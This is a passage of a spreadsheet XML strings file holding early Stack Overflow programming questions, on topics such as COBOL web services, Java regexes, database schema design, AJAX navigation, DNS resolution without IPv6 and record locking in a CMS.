    <t>Would it be possible to use web services from a Cobol program?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have some COBOL programs in our financial applications which need to interact with some of our backend systems. One of the available interfaces is through a web service. Can a program written in Cobol make requests to a web service?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a source-control system that allows tracking of file name changes?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So, I've been living with my cvs repositories for some time. Though there is a thing I miss - if i rename a file that is already in repository, I need to delete the one with old name from there and add the new one. Hence, I loose all my change-history. And sometimes there's a need to rename a file in alredy existing project.&lt;/p&gt;
&lt;p&gt;From what I saw, cvs/svn can't handle something like this, or am I wrong? If not, what other source control system would you recommend, that allows the renaming of files? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Regular expression to match URLs in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I use RegexBuddy while working with regular expressions. From its library I copied the regular expression to match URLs. I tested successfully within RegexBuddy. However, when I copied it as Java &lt;code&gt;String&lt;/code&gt; flavor and pasted it into Java code, it does not work. The following class prints &lt;code&gt;false&lt;/code&gt;: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class RegexFoo {
    public static void main(String[] args) {
        String regex = "\\b(https?|ftp|file)://[-A-Z0-9+&amp;amp;@#/%?=~_|!:,.;]*[-A-Z0-9+&amp;amp;@#/%=~_|]";
        String text = "http://google.com";
        System.out.println(IsMatch(text,regex));
}
    private static boolean IsMatch(String s, String pattern) {
        try {
            Pattern patt = Pattern.compile(pattern);
            Matcher matcher = patt.matcher(s);
            return matcher.matches();
        } catch (RuntimeException e) {
        return false;
    }       
}   
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Does anyone know what I am doing wrong?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Database Design Issues with relationships</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on an upgrade for an existing database that was designed without any of the code to implement the design being considered. Now I've hit a brick wall in terms of implementing the database design in code. I'm certain whether its a problem with the design of the database or if I'm simply not seeing the correct solution on how to what needs to be done. &lt;/p&gt;
&lt;p&gt;The basic logic stipulates the following:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Users access the online trainings by way of Seats. Users can have multiple Seats.&lt;/li&gt;
&lt;li&gt;Seats are purchased by companies and have a many-to-many relationship with Products.&lt;/li&gt;
&lt;li&gt;A Product has a many-to-many relationship with Modules.&lt;/li&gt;
&lt;li&gt;A Module has a many-to-many relationship with Lessons.&lt;/li&gt; 
&lt;li&gt;Lessons are the end users access for their training.&lt;/li&gt;
&lt;li&gt;To muddy the waters, for one reason or another some Users have multiple Seats that contain the same Products. &lt;/li&gt;
&lt;li&gt;Certification takes place on a per Product basis, not on a per Seat basis.&lt;/li&gt;
&lt;li&gt;Users have a many-to-many relationship with lessons that stores their current status or score for the lesson.&lt;/li&gt;
&lt;li&gt;Users certify for a Product when they complete all of the Lessons in all of the Modules for the Product.&lt;/li&gt;
&lt;li&gt;It is also significant to know when all Lessons for a particular Module are completed by a User.&lt;/li&gt;
&lt;li&gt;Some Seats will be for ReCertification meaning that Users that previously certified for a Product can sign up and take a recertification exam.&lt;/li&gt;
&lt;li&gt;Due to Rule 11, Users can and will have multiple Certification records.&lt;/li&gt;
&lt;li&gt;Edit: When a User completes a Lesson (scores better than 80%) then the User has (according to the current business logic) completed the Lesson for all Products and all Seats that contain the Lesson.
&lt;/ol&gt;
&lt;p&gt;The trouble that I keep running into with the current design and the business logic as I've more or less described it is that I can't find a way to effectively tie whether a user has certified for a particular product and seat vs when they have not. I keep hitting snags trying to establish which Products under which Seats have been certified for the User and which haven't. Part of the problem is because if they are currently registered for multiple of the same Product under different Seats, then I have to count the Product only once.&lt;/p&gt;
&lt;p&gt;Below is a copy of the portion of the schema that's involved. Any suggestions on how to improve the design or draw the association in code would be appreciated. In case it matters, this site is built on the LAMPP stack.&lt;/p&gt;
&lt;p&gt;You can view the relevant portion of the database schema here: &lt;a href="http://lpsoftware.com/problem_db_structure.png" rel="nofollow"&gt;http://lpsoftware.com/problem_db_structure.png&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Printing to a pdf printer programatically</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to print an existing file to PDF programmatically in Visual Basic 2008.&lt;/p&gt;
&lt;p&gt;Our current relevant assets are:
Visual Studio 2008 Professional
Adobe Acrobat Professional 8.0&lt;/p&gt;
&lt;p&gt;I thought about getting a sdk like ITextSharp, but it seem like overkill for what I am trying to do especially since we have the full version of Adobe. &lt;/p&gt;
&lt;p&gt;Is there a relatively simple bit of code to print to a PDF printer (and of course assign it to print to a specific location) or will it require a the use of another library to print to pdf?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;I want to print a previosly created document to a pdf file. In this case it a .snp file that I want to make into a .pdf file, but I think the logic would be the same for any file type.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;I just tried the above shell execute, and it will not perform the way I want it to. as it prompts me as to where I want to print and still does not print where I want it to (multiple locations), which is crucial as we create a lot of the same named PDF files (with different data within the PDF and placed in corresponding client folders) &lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;The current process is:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Go to \\report server\client1 &lt;/li&gt;
&lt;li&gt;create pdf files of all the snp documents in the folder by hand &lt;/li&gt;
&lt;li&gt;copy the pdf to \\website reports\client1&lt;/li&gt;
&lt;li&gt;then repeat for all 100+ clients takes roughly two hours to complete and verify&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I know this can be done better but I have only been here three months and there were other pressing concerns that were a lot more immediate. I also was not expecting something that looks this trivial to be that hard to code.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a maximum number of characters that can be written using a StreamWriter?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a maximum number of characters that can be written to a file using a StreamWriter? Or is there a maximum number of characters that &lt;code&gt;WriteLine()&lt;/code&gt; can output? I am trying to write some data to a file but all of the data does not seem to make it. This is the current state of my code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;StreamWriter sw = new StreamWriter(pathToFile);
foreach (GridViewRow record in gv_Records.Rows)
{
    string recordInfo = "recordInformation";
    sw.WriteLine(recordInfo);
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>AJAX and the Browser Back Button</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I run a browser based game at www.darknovagames.com. Recently, I've been working on reformatting the site with CSS, trying to get all of its pages to verify according to the HTML standard.&lt;/p&gt;
&lt;p&gt;I've been toying with this idea of having the navigation menu on the left AJAX the pages in (rather than taking the user to a separate page each time, requiring a reload of the title and nav bar, which almost never change) and I know that if I do so, I will probably break the Forward/Back buttons in the browser. My question I guess is, should I go ahead and AJAX the site, thus requiring the user to use the sites navigation to play the game, or should I leave the site as it currently stands, and use standard hyperlinks and things for navigation?&lt;/p&gt;
&lt;p&gt;The reason I ask I guess is that I built a forums system into the site, and a lot of times I would want to link say to a particular topic within the forums.&lt;/p&gt;
&lt;p&gt;I'm also open to suggestions. Is there a standard (preferably without traditional frames) way to make only the body area of the site reload, while still changing the URL so that users can bookmark and forward/back, etc? That could potentially solve my problem as well. I'm just asking for the best solution here, not an answer to a specific question. ^_^&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET project size</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any known issues around how many "pages" are in an ASP.NET project?&lt;/p&gt;
&lt;p&gt;Does the size of the DLL created by the project matter at all?&lt;/p&gt;
&lt;p&gt;My existing project is about 150 pages and the DLL is only around 3MB but it has increased from about 50 pages and 0.5 MB recently&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Generic GDI+ Error</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Form being launched from another form on a different thread. Most of the time it works perfectly, but I get the below error from time to time. Can anyone help?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;at System.Drawing.Bitmap..ctor(Int32 width, Int32 height, PixelFormat format)
at System.Drawing.Bitmap..ctor(Int32 width, Int32 height)
at System.Drawing.Icon.ToBitmap()
at System.Windows.Forms.ThreadExceptionDialog..ctor(Exception t)
at System.Windows.Forms.Application.ThreadContext.OnThreadException(Exception t)
at System.Windows.Forms.Control.WndProcException(Exception e)
at System.Windows.Forms.Control.ControlNativeWindow.OnThreadException(Exception e)
at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)    
at System.Windows.Forms.UnsafeNativeMethods.DispatchMessageW(MSG&amp;amp; msg)
at System.Windows.Forms.Application.ComponentManager.System.Windows.Forms.UnsafeNativeMethods.IMsoComponentManager.FPushMessageLoop(Int32 dwComponentID, Int32 reason, Int32 pvLoopData)
at System.Windows.Forms.Application.ThreadContext.RunMessageLoopInner(Int32 reason, ApplicationContext context)    
at System.Windows.Forms.Application.ThreadContext.RunMessageLoop(Int32 reason, ApplicationContext context)    
at System.Windows.Forms.Form.ShowDialog(IWin32Window owner)    
at System.Windows.Forms.Form.ShowDialog()
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>HTML/Javascript app that runs on the filesystem, security issue</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm putting together a little tool that some business people can run on their local filesystems, since we don't want to setup a host for it.&lt;/p&gt;
&lt;p&gt;Basically, its just HTML + Javascript (using jQuery) to pull some reports using REST from a 3rd party.&lt;/p&gt;
&lt;p&gt;The problem is, FF3 and IE don't allow the ajax call, I get:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Access to restricted URI denied" code: "1012
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Obviously its an XSS issue...how do I work around it? The data returned is in XML format.&lt;/p&gt;
&lt;p&gt;I was trying to do it this way:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$.get(productUrl, function (data){
    alert (data);
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;: To be clear...I'm not setting up an internal host for this(Way to much red tape), and we CANNOT host this externally due to the data being retrieved.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT #2&lt;/strong&gt;: A little testing shows that I can use an IFRAME to make the request. Does anyone know if there any downsides to using a hidden IFRAME?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best Source Control Solution for Oracle/ASP.NET Environment?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to plan a way for 5 developers to use Visual Studio 2005/2008 to collaboratively develop an ASP.NET web app on a development web server against an Oracle 8i(soon to be 10g) Database.&lt;/p&gt;
&lt;p&gt;The developers are either on the local network or coming in over a vpn (not a very fast connection), &lt;/p&gt;
&lt;p&gt;I evaluated the latest Visual SourceSafe, but ran into the following gotchas: &lt;/p&gt;
&lt;p&gt;1) We can't use decentralized development because we can't replicate a development oracle database to all developers computers. Also, the vpn is too slow to let their local app instances connect to the database server.&lt;/p&gt;
&lt;p&gt;2) Since VSS source code not on the file system, the only way to debug it is to build the app and run debugger, which only one developer can do at a time on a centralized development server. This is unacceptable. We tried using shadow folders so that every time a file is checked in it gets published to the app instance on the development server, but this failed for remote developers on the vpn. &lt;/p&gt;
&lt;p&gt;3) Since the developers do a lot of web code, it is important for productivity reasons that when they SAVE a file, they should be able to immediately see the change working on the development server. &lt;/p&gt;
&lt;p&gt;4) No easy way to implement a controlled process for pushing files to the production server.  &lt;/p&gt;
&lt;p&gt;Any suggestions on a source control solution that would work under these contraints? &lt;/p&gt;
&lt;p&gt;Thanks in advance for any suggestions!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; I guess since development is forced to be on the server, we need to go with a "Lock and Check In" model. So which source control solution would work best for "Lock and Check In' scenarios?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; Does Visual SVN support developing centrally against a development server? As in, the dev can immediately see his update on the development server after saving in VS? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should QA test from a strictly black-box perspective?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Assuming that unit tests are handled by development, is there any reason for QA to have knowledge of the details of how a product works?  By which I mean, do they need to know what's going on in the background and should they test segments of a product without using the normal UI?  For example, would it make sense for a tester to go into a database and manually change values to see what will happen?&lt;BR&gt;&lt;BR&gt;
EDIT:
&lt;br&gt;
Let's assume that we're working with an application to be used by non-developers, we're not working on something with an API attached.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ping Failure Without IPv6</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Our user interface is communicating with another application on a different machine, often connecting using domain names. &lt;/p&gt;
&lt;p&gt;On our network, when IPv6 is installed, DNS name resolution works great, all machines can be pinged and contacted fine.&lt;/p&gt;
&lt;p&gt;When IPv6 is uninstalled, pinging the same DNS names returns an IP address on some distant subnet (24.28.193.9; local subnet is 192.168.1.1); our application is then unable to communicate. When IPv6 is reinstalled, the DNS resolution corrects itself. &lt;/p&gt;
&lt;p&gt;Even without IPv6 when ping is not working, I can still browse other machines using Windows Explorer by entering &lt;code&gt;\\\\MACHINE_NAME\\&lt;/code&gt;. I'm not sure why the name resolution seems to work here. We are working in the Windows XP SP2 environment.&lt;/p&gt;
&lt;p&gt;The IPs of the machines can be pinged successfully. It is only the DNS names that do not resolve properly. &lt;/p&gt;
&lt;p&gt;I looked for the address of our DNS server. All of our computers are pointing at the network gateway, which is a wireless router. The router has the same DNS server address listed when IPv6 is installed as it does when it isn't installed.&lt;/p&gt;
&lt;p&gt;The strangest thing is that I just discovered that it does not matter what DNS name I ping. All pings to DNS names return the same address: "24.28.193.9".&lt;/p&gt;
&lt;p&gt;I tried flushing the DNS Resolver Cache and registering DNS on the target machine and the source machine. All to no avail. The only DNS name that I can ping is the name of the current machine.&lt;/p&gt;
&lt;p&gt;Any thoughts as to why our software can't communicate without IPv6 installed?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt;  &lt;/p&gt;
&lt;p&gt;OK, I've done a little more research now.&lt;/p&gt;
&lt;p&gt;I looked for the address of our DNS server. All of our computers are pointing at the network gateway, which is a wireless router. The router has the same DNS server address listed when IPv6 is installed as it does when it isn't installed.&lt;/p&gt;
&lt;p&gt;The strangest thing is that I just discovered that it does not matter what DNS name I ping. All pings to DNS names return the same address: "24.28.193.9".&lt;/p&gt;
&lt;p&gt;I tried flushing the DNS Resolver Cache and registering DNS on the target machine and the source machine. All to no avail. The only DNS name that I can ping is the name of the current machine.&lt;/p&gt;
&lt;p&gt;Any other suggestions? Thanks so much for your help.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sql 2005 Express edition slow connections</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm running SqlServer 2005 express edition on my laptop for development purposes. It seems that when I open a connection to the database, the setup time is REALLY slow. It can take up to 10 seconds to get a connection. I usually have multiple connections open at the same time (Profiler, Development environment, Query Analyser, etc.) I have a hunch that the slow times are related to the fact that I have multiple connections open. &lt;/p&gt;
&lt;p&gt;Is there a governor in Express edition that throttles connection times when multiple connections are made to an instance?&lt;/p&gt;
&lt;p&gt;Update:
My workstation is not on active directory, and SQL is running mixed mode security. I will try the login with sql authentication. I am not using user instances.&lt;/p&gt;
&lt;p&gt;Update2:
I setup a trace to try and figure out what is going on. When the connection to the database is opened the follow command is executed:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;master.dbo.sp_MShasdbaccess
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This command takes 6 seconds to execute.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is it that UTF-8 encoding is used when interacting with a UNIX/Linux environment?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know it is customary, but why? Are there real technical reasons why any other way would be a really bad idea or is it just based on the history of encoding and backwards compatibility? In addition, what are the dangers of not using &lt;code&gt;UTF-8&lt;/code&gt;, but some other encoding (most notably, &lt;code&gt;UTF-16&lt;/code&gt;)? &lt;/p&gt;
&lt;p&gt;Edit : By interacting, I mostly mean the &lt;code&gt;shell&lt;/code&gt; and &lt;code&gt;libc&lt;/code&gt;. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Programmatically launching standalone Adobe flashplayer on Linux/X11</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The standalone flashplayer takes no arguments other than a .swf file when you launch it from the command line. I need the player to go full screen, no window borders and such. This can be accomplished by hitting ctrl+f once the program has started. I want to do this programmatically as I need it to launch into full screen without any human interaction.&lt;/p&gt;
&lt;p&gt;My guess is that I need to some how get a handle to the window and then send it an event that looks like the "ctrl+f" keystroke. &lt;/p&gt;
&lt;p&gt;If it makes any difference, it looks like flashplayer is a gtk application and I have python with pygtk installed.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;UPDATE&lt;/b&gt; (the solution I used... thanks to ypnos' answer):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;./flashplayer http://example.com/example.swf &amp;amp; sleep 3 &amp;amp;&amp;amp; ~/xsendkey -window "Adobe Flash Player 10" Control+F
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>To Nest or Not to Nest?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Premise:&lt;/strong&gt;
Usually during preparation of a new Ruby on Rails App, I draw out models and relations regarding user navigations. Usually I hit a place where I need to ask myself, whether or not I should go beyond the usual "rule of thumb" of nesting no more 1 level deep. Sometimes I feel the need to nest, rather than creating another namespace route and duplicating work. 
&lt;br/&gt;Here's an example:&lt;br/&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Models:&lt;/strong&gt; User, Company, Location &lt;br/&gt;
User has and belongs to many Companies (many to many) &lt;br/&gt;
User has and belongs to many Locations (many to many) &lt;br/&gt;
Company has and belongs to many Locations (many to many) &lt;br/&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Routes:&lt;/strong&gt;&lt;br/&gt;
&lt;strong&gt;&lt;em&gt;1 level nesting&lt;/em&gt;&lt;/strong&gt; &lt;br/&gt;
users/:user_id/companies/ - list all companies related to a user&lt;br/&gt;
users/:user_id/locations/ - list all locations related to a user&lt;br/&gt;
&lt;strong&gt;&lt;em&gt;more than 1 level nesting&lt;/em&gt;&lt;/strong&gt;&lt;br/&gt;
users/:user_id/companies/:company_id/locations/ - list all company-locations of a user&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;So, my question is whether or not it is appropriate to nest more than 1 level deep in RoR? Yes or no? And why?&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I see my applications threads while debugging in Visual Studio?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to see the threads currently active in my application while debugging it.&lt;/p&gt;
&lt;p&gt;How can I do this using Visual Studio?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to create and resolve relative paths?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My app open file in subdirectory of directory where it is executed, subdirectory is called &lt;code&gt;sample&lt;/code&gt; and it contains files:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;example.raf&lt;/code&gt; (example extension, non significant)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;background.gif&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;code&gt;example.raf&lt;/code&gt; contains relative path to &lt;code&gt;background.gif&lt;/code&gt; (in this case only file name cause the files is in same directory as raf) and opening of RAF causes application to read and display &lt;code&gt;background.gif&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;When I use &lt;code&gt;OpenFileDialog&lt;/code&gt; to load RAF file everything is alright, image loads correctly. I know that open file dialog changes in some way current working directory but i was unable to recreate this  without calling open file dialog&lt;/p&gt;
&lt;p&gt;Unfortunately in case when i call &lt;strong&gt;raf reading&lt;/strong&gt; method directly from code, without supplying path to file form &lt;code&gt;OpenFileDialog&lt;/code&gt; like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;LoadRAF("sample\\example.raf");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;in this case i got problem, app try to load image from  &lt;strong&gt;ExecutablePath&lt;/strong&gt; and not from subdirectory which contains &lt;strong&gt;RAF&lt;/strong&gt; file and &lt;strong&gt;image&lt;/strong&gt;. Ofcourse it is normal behavior but in this case it is highkly unwanted. It is required to handle both relative and absolute type of paths in my app, so what should i do to solve this, how to &lt;strong&gt;change ExecutablePath&lt;/strong&gt;  or what other thing i can do to make this work at least as in case of &lt;code&gt;OpenFileDialog&lt;/code&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>CLOS like object model for PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have returned to php development from &lt;a href="http://www.iinteractive.com/moose/" rel="nofollow"&gt;Moose&lt;/a&gt; and I really miss CLOS like object model for php. Is there some kind of syntaxtic sugar which would allow me to write &lt;strong&gt;less code&lt;/strong&gt; in php when dealing with objects?&lt;/p&gt;
&lt;p&gt;Just to stress this requirement a bit more. I don't want to write one thing in several places. I can live with part of code being generated automatically, but in the code that I have to see to develop I don't want to see redundant information which is just clutter (think: LISP macro if you really need more analogy). So this part can be also called DSL if that makes more sense.&lt;/p&gt;
&lt;p&gt;I would love to have at least &lt;strong&gt;roles&lt;/strong&gt; (mixins), and some kind of &lt;strong&gt;introspection&lt;/strong&gt; without re-inventing the weel. Code generators and auto-loaders might be one way to solve at least part of this problem.&lt;/p&gt;
&lt;p&gt;p.s. For JavaScript there is &lt;a href="http://code.google.com/p/joose-js/" rel="nofollow"&gt;Joose&lt;/a&gt;, so similar API would be very useful.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>If I grab a paramenter out of the query string, is it URL decoded?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In .NET if I do something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string temp = Request.QueryString["myKey"];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;is the value in temp already URL decoded?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Referencing build artifacts from an svn:external build in .Net project</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is a continuation question from a previous question &lt;a href="http://stackoverflow.com/questions/142237/integrating-external-sources-in-a-build."&gt;I have asked&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I now have a /externals directory in the root of my project tree. Inside this I have a reference to another project. I'm able to script the build of all my externals in the main project NAnt script. The result of these builds are as follows:&lt;/p&gt;
&lt;p&gt;/externals/external-project1/build/buildartifacts/{dlls|html|js}&lt;/p&gt;
&lt;p&gt;/externals/external-project2/build/buildartifacts/{dlls|html|js}&lt;/p&gt;
&lt;p&gt;This is all well and good, but now I'm curious as to how my main project should reference these build artifacts. For example, let's say that external project builds a DLL that some of my codebase depends on. Should I simply reference the DLL in the build artifacts directory or should I implement another NAnt task that copies these to a /thirdparty/libs/ folder?&lt;/p&gt;
&lt;p&gt;This means that my build is now dependent on the ability to build this external project (which could either be internal, or thirdparty). Is it a good idea to check in the latest set of build artifacts to ensure that the main build won't break because of dependent builds breaking?&lt;/p&gt;
&lt;p&gt;Hope that's clear enough. Just writing this down has a least clarified the problem for me :-).&lt;/p&gt;
&lt;p&gt;--Edit--&lt;/p&gt;
&lt;p&gt;Thanks guys. I think I'm going to implement the "checkout a revision", but since the builds are so quick I'm not going to check in any build artifiacts. Also going to have to figure out how to deal with the dependencies of the external project (eg: prototype, swfobject, etc).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Installing .NET 3.5 on a server with .NET 2.0 applications</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to upgrade my web projects on an IIS 5 server from .NET 2.0 to .NET 3.5.  These web applications live on a server with other web applications that will not be upgraded to .NET 3.5.  The server administrator is reluctant to install .NET 3.5 because he is afraid it will break the applications on that machine that are running 2.0 and 1.1.&lt;/p&gt;
&lt;p&gt;As far as I know this WON'T be a problem since .NET 3.5 is an addition to 2.0 more than it is a new Framework.  I would like the communities help gathering evidence to show him that their concerns are moot and it won't hurt the other applications.&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SubSonic SubSonic.SqlQuery &amp; Dates</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does SubSonic.SqlQuery have a between/and for date ranges?  If not, what would be the best way to get a range.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In Ruby on Rails, how do I format a date with the "th" suffix, as in, "Sun Oct 5th"?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to display dates in the format: short day of week, short month, day of month without leading zero but including "th", "st", "nd", or "rd" suffix.&lt;/p&gt;
&lt;p&gt;For example, the day this question was asked would display "Thu Oct 2nd".&lt;/p&gt;
&lt;p&gt;I'm using Ruby 1.8.7, and &lt;a href="http://ruby-doc.org/core/Time.html#method-i-strftime"&gt;Time.strftime&lt;/a&gt; just doesn't seem to do this.  I'd prefer a standard library if one exists.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to add a Tooltip to a "td" with jquery?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to add a tooltip/alt to a "td" element inside of my tables with jquery.&lt;/p&gt;
&lt;p&gt;Can someone help me out?&lt;/p&gt;
&lt;p&gt;I tried:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var tTip ="Hello world";
$(this).attr("onmouseover", tip(tTip));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;where I have verified that I am using the "td" as "this".&lt;/p&gt;
&lt;p&gt;**Edit:**I am able to capture the "td" element through using the "alert" command and it worked.  So for some reason the "tip" function doesn't work.  Anyone know why this would be?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is my Perl regex using so much memory?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm running a regular expression against a large scalar.  Though this match isn't capturing anything, my process grows by 30M after this match:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# A
if (${$c} =~ m/\G&amp;lt;&amp;lt;\s*/cgs)
{
    #B
    ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;$c&lt;/code&gt; is a reference to a pretty big scalar (around 21M), but I've verified that &lt;code&gt;pos(${$c})&lt;/code&gt; is in the right place and the expression matches at the first character, with &lt;code&gt;pos(${$c})&lt;/code&gt; being updated to the correct place after the match.  But as I mentioned, the process has grown by about 30M between #A and #B, even though I'm not capturing anything with this match.  Where is my memory going?&lt;/p&gt;
&lt;p&gt;Edit:  Yes, use of &lt;code&gt;$&amp;amp;&lt;/code&gt; was to blame.  We are using Perl 5.8.8, and my script was using &lt;a href="http://search.cpan.org/dist/Getopt-Declare" rel="nofollow"&gt;Getopt::Declare&lt;/a&gt;, which uses the built-in &lt;a href="http://search.cpan.org/dist/Text::Balanced" rel="nofollow"&gt;Text::Balanced&lt;/a&gt;.  The 1.95 version of this module was using &lt;code&gt;$&amp;amp;&lt;/code&gt;.  The 2.0.0 version that ships with Perl 5.10 has removed the reference to &lt;code&gt;$&amp;amp;&lt;/code&gt; and alleviates the problem.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can J# code run on JVM</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I create a J# Application is there any way I can execute it on JVM as well&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to debug RESTful services?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for an easy way to debug RESTful services. For example, most webapps can be debugged using your average web browser. Unfortunately that same browser won't allow me to test HTTP PUT, DELETE, and to a certain degree even HTTP POST.&lt;/p&gt;
&lt;p&gt;I am not looking to automate tests. I'd like to run new services through a quick sanity check, ideally without having to writing my own client.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the nicest way to do observer/observable in objective-c (iphone version)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm used to coding Java Swing UIs, and in those if you have some properties that change, and you want your UI to update, you would implement the observer/observable pattern. In Java you do this normally by having your class maintain a list of listeners that it notifies of different events.&lt;/p&gt;
&lt;p&gt;I've played with Objective-C on the Mac, and that has KVC and binding which seems to work very nicely, and requires less code. The iPhone SDK doesn't seem to have this functionality though, so my question is:
If I have a class that holds data that changes, what's the best way for me to register a UI component with that class so that it can be notified of changes in the data that it needs to display?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way for me to implement record locking?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a question about locking. This doesn't have to be only about record locking, but anyway.&lt;/p&gt;
&lt;p&gt;Let's say I'm writing a web accessible CMS. I am struggling with some ideas.&lt;/p&gt;
&lt;p&gt;I could, on the moment when a user opens an article for editing, flag the article as being 'in use'. so far so good.&lt;/p&gt;
&lt;p&gt;but when do I remove the flag? when the user saves the article? but what if the user doesn't feel like typing anymore and decides to close his browser and go to bed?&lt;/p&gt;
&lt;p&gt;a time-out mechanism comes to mind, but how long does it take to write an article? 10 minutes too short, 30 minutes too long..&lt;/p&gt;
&lt;p&gt;Maybe I am over-complicating this. I'd like to hear your thoughts on this subject.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Site-Mining tools</t>
  </si>
  <si>
